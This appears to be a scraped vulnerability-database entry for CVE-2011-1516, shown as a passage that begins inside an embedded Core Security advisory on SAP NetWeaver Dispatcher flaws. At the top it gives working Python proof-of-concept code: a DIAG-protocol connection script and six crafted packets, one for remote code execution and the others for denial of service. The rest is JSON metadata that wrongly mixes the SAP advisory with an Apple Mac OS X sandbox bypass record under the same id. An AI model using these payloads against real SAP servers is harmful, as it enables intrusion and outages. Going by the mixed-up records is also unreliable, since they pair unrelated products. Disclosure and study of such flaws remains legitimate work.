help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n    packet = struct.pack(\"!I\", len(packet)) + packet\n    sock.send(packet)\n\ndef receive(sock):\n    length = sock.recv(4)\n    (length, ) = struct.unpack(\"!I\", length)\n    data = \"\"\n    while len(data)\u003clength:\n        data+= sock.recv(length)\n    return (length, data)\n\ndef initialize(sock):\n    diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n    user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n    support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n    support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n    support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n    dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n    dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n    dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff                                        \"\n    dpheader+= \"terminalXXXXXXX\"\n    dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00                   \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n    send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n    diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n    step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n    eom = \"\\x0c\"\n    send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection)      \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n\u0027disp+work.exe\u0027 module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function\n\u0027DiagTraceR3Info\u0027 in the \u0027disp+work.exe\u0027 module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. This vulnerability\ncould allow a remote unauthenticated attacker to execute arbitrary code\nwith the privileges of the user running the \"Dispatcher\" service. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"X\"*114 + \"\\xff\\xff\" # --\u003e Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*\n\n[CVE-2011-1517] The vulnerability can be triggered by sending a\nspecially crafted network packet to the vulnerable function\n\u0027DiagTraceHex\u0027 in the \u0027disp+work.exe\u0027. This vulnerability could allow a\nremote unauthenticated attacker to conduct a denial of service attack\nagainst the vulnerable systems. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*\n\n[CVE-2012-2511] The vulnerability can be triggered by sending a\nspecially crafted network packet to the vulnerable function\n\u0027DiagTraceAtoms\u0027. This vulnerability could allow a remote\nunauthenticated attacker to conduct a denial of service attack. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*\n\n[CVE-2012-2512] The vulnerability can be triggered by sending a\nspecially crafted network packet to the vulnerable function\n\u0027DiagTraceStreamI\u0027 and could allow a remote unauthenticated attacker to\nconduct a denial of service attack. \n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*\n\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\nfunction \u0027Diaginput\u0027, allowing a denial of service attack against the\nvulnerable systems. \n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\n\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\nfunction \u0027DiagiEventSource\u0027 in the \u0027disp+work.exe\u0027 module. This\nvulnerability could allow a remote unauthenticated attacker to conduct a\ndenial of service attack. \n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012. 2012-01-24:\nCore sends an advisory draft with technical details. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP\u0027s\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP\u0027s guidelines as much as possible. 2012-02-21:\nFirst release date missed. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012. 2012-02-23:\nCore re-schedules the advisory publication to May 8th. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received). 2012-05-07:\nCore asks again for the status of the fix. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8]. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information. 2012-05-08:\nAdvisory CORE-2012-0123 published. \n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP\u0027s legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "BID",
        "id": "50644"
      },
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "db": "PACKETSTORM",
        "id": "112538"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-49461",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=18853",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-1516",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "50644",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "112538",
        "trust": 0.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "18853",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-72871",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106850",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-49461",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "db": "BID",
        "id": "50644"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "PACKETSTORM",
        "id": "112538"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "id": "VAR-201111-0111",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:22:02.564000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.apple.com/"
      },
      {
        "title": "MacOSXUpd10.7.1",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=41794"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/archive/1/520479/100/100/threaded"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1516"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-1516"
      },
      {
        "trust": 0.7,
        "url": "http://www.securityfocus.com/bid/50644"
      },
      {
        "trust": 0.3,
        "url": "http://www.apple.com/macosx/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/112538/sap-netweaver-7.0-ehp1-ehp2-buffer-overflows.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/18853/"
      },
      {
        "trust": 0.1,
        "url": "https://service.sap.com/sap/support/notes/1687910"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/content/services-overview-core-security-consulting-services."
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2511"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
      },
      {
        "trust": 0.1,
        "url": "http://www.sap.com/platform/netweaver/index.epx"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1516"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1517"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2513"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/content/corelabs-advisories"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2514"
      },
      {
        "trust": 0.1,
        "url": "https://service.sap.com/sap/support/notes/1687910."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2512"
      },
      {
        "trust": 0.1,
        "url": "http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46."
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "db": "BID",
        "id": "50644"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "PACKETSTORM",
        "id": "112538"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "db": "BID",
        "id": "50644"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "db": "PACKETSTORM",
        "id": "112538"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2011-11-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "date": "2011-11-15T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "date": "2011-11-10T00:00:00",
        "db": "BID",
        "id": "50644"
      },
      {
        "date": "2011-11-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "date": "2012-05-08T15:15:15",
        "db": "PACKETSTORM",
        "id": "112538"
      },
      {
        "date": "2011-11-15T18:55:01.637000",
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-49461"
      },
      {
        "date": "2018-10-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2011-1516"
      },
      {
        "date": "2011-11-10T00:00:00",
        "db": "BID",
        "id": "50644"
      },
      {
        "date": "2011-11-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      },
      {
        "date": "2018-10-09T19:31:06.410000",
        "db": "NVD",
        "id": "CVE-2011-1516"
      },
      {
        "date": "2011-11-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "112538"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apple Mac OS X Network resource access vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-003010"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201111-271"
      }
    ],
    "trust": 0.6
  }
}

GHSA-VPRF-3XMV-J9FJ

Vulnerability from github – Published: 2022-05-14 02:55 – Updated: 2022-05-14 02:55

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2011-1516"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-11-15T18:55:00Z",
    "severity": "HIGH"
  },
  "details": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.",
  "id": "GHSA-vprf-3xmv-j9fj",
  "modified": "2022-05-14T02:55:48Z",
  "published": "2022-05-14T02:55:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-1516"
    },
    {
      "type": "WEB",
      "url": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/520479/100/100/threaded"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GSD-2011-1516

Vulnerability from gsd - Updated: 2023-12-13 01:19

Details

Aliases

CVE-2011-1516

Aliases

CVE-2011-1516

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2011-1516",
    "description": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.",
    "id": "GSD-2011-1516",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2011-1516"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2011-1516"
      ],
      "details": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.",
      "id": "GSD-2011-1516",
      "modified": "2023-12-13T01:19:08.099131Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2011-1516",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass",
            "refsource": "MISC",
            "url": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass"
          },
          {
            "name": "20111110 CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass",
            "refsource": "BUGTRAQ",
            "url": "http://www.securityfocus.com/archive/1/520479/100/100/threaded"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-1516"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-264"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass",
              "refsource": "MISC",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.coresecurity.com/content/apple-osx-sandbox-bypass"
            },
            {
              "name": "20111110 CORE-2011-0919: Apple OS X Sandbox Predefined Profiles Bypass",
              "refsource": "BUGTRAQ",
              "tags": [],
              "url": "http://www.securityfocus.com/archive/1/520479/100/100/threaded"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
